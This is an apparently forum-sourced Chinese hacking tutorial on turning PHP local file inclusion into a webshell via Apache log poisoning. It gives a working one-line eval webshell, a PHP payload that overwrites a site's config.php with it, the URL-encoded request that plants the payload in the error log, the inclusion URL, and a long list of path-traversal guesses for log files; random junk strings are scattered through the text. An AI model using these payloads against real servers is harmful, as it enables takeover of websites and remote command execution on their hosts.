php包含apache日志写马

admin

因为上面那个很不实际，我在测试中发现日志动不动就是几十兆，那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用，也比上面那种慢的要死好很多。
  ]& J- c! i# f% [( D
比如还是这句一句话木马
<?eval($_POST[cmd]);?>   
3 C- ?0 f6 X, a# g
到这里你也许就想到了，这是个很不错的办法。接着看,如何写入就成了个问题，用这句，
) |# N6 L0 V1 H& O% |$ Mfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件，然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里写入一句木马语句
& Y+ D( W) z6 J8 k: E
我们提交这句，再让Apache记录到错误日志里，再包含就成功写入shell,记得一定要转换成URL格式才成功。
& E) R' _! s/ N+ G) g  D1 ?转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
! J) o& S+ s% @config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
8 W5 B/ x3 \6 e) R/ m& \' f( I/ y' Y%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
$ k5 a6 G  x0 h* G9 ~+ X5 H6 E! Tfclose%28%24fp%29%3B%3F%3E
我们提交
' S! s& o0 V2 i; q5 A& mhttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
& i3 G( }: y: U6 b5 D%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
( z% m6 x6 y. k8 `* a
这样就错误日志里就记录下了这行写入webshell的代码。
我们再来包含日志，提交
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
$ J: x/ V& J; M4 n, x/ k
) C1 V; Y8 J. C# J/ y5 t+ {. I这样webshell就写入成功了，config.php里就写入一句木马语句
/ G4 `& i. g- n2 H9 IOK.
2 B. E. d, ^( A- f$ }' Phttp://www.xxx.com/forum/config.php这个就成了我们的webshell
; U* Y+ @% f  V; P% f4 _5 I直接用lanker的客户端一连，主机就是你的了。
* T% y) N9 }, _8 z
PS:上面讲的，前提是文件夹权限必须可写 ，一定要-rwxrwxrwx(777)才能继续，这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用

0 [8 i) N5 Q# ?, Q# J+ |' j其他的日志路径，你可以去猜，也可以参照这里。
4 \6 J6 a% V/ b( R. o../../../../../../../../../../var/log/httpd/access_log
" l- m( `3 e8 a" {9 f. `! p6 H../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
  j3 \2 L" H! U5 c+ n../../../../../../../../../../etc/httpd/logs/acces_log
/ g+ U1 F  i/ F../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
7 t+ X0 ?! z4 i5 C9 T8 t) i' b- t../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
; {. a" d6 {/ f' i/ }../../../../../../../../../../var/log/apache/access_log
' `5 n6 E6 ?9 J" M# a../../../../../../../../../../var/log/apache/access.log
4 h: y& D' K4 D../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
% n) j+ d2 J9 [% R6 O' D../../../../../../../../../../var/www/logs/error.log
" e! C- n" L! l2 h* B' y../../../../../../../../../../usr/local/apache/logs/error_log
! Z7 d5 p3 O6 \% g! d! s$ G8 J../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
8 I0 }# g+ q* t0 z7 G" ]../../../../../../../../../../var/log/error_log
6 f' L. D, |+ t7 D2 c$ B" |/var/log/httpd/access_log      
* e& E1 H( p0 z! W1 r/ w- P/var/log/httpd/error_log     
../apache/logs/error.log     
../apache/logs/access.log
5 R& r: k0 P, ~0 |../../apache/logs/error.log
  |/ D7 ^* @; x+ ~+ j../../apache/logs/access.log
3 t) e4 b( \5 h/ _  d6 }../../../apache/logs/error.log
../../../apache/logs/access.log
6 _' l* s) }1 }5 h/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/ }0 N/ ^; a& t- A9 G, X/var/www/logs/access_log
: n5 b6 S$ o& A+ w/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
2 M* a3 p* F& c, f& d- T1 A5 X+ L, M. z/var/log/apache/access.log
/var/log/access_log
" w2 m* `: l. m$ r8 ^/var/www/logs/error_log
; v2 `& Q* A2 `4 G/var/www/logs/error.log
: M- a; g" c4 g; ^( Q  @/usr/local/apache/logs/error_log
# e$ }+ R1 y4 z9 o' X3 F% a! H% s$ c  @/usr/local/apache/logs/error.log
/var/log/apache/error_log
( }$ t- Z3 i! ~+ E* W( P& Y/var/log/apache/error.log
* S% f9 v7 c1 Q; z* z2 u/var/log/access_log
' A7 l, f3 u+ t/var/log/error_log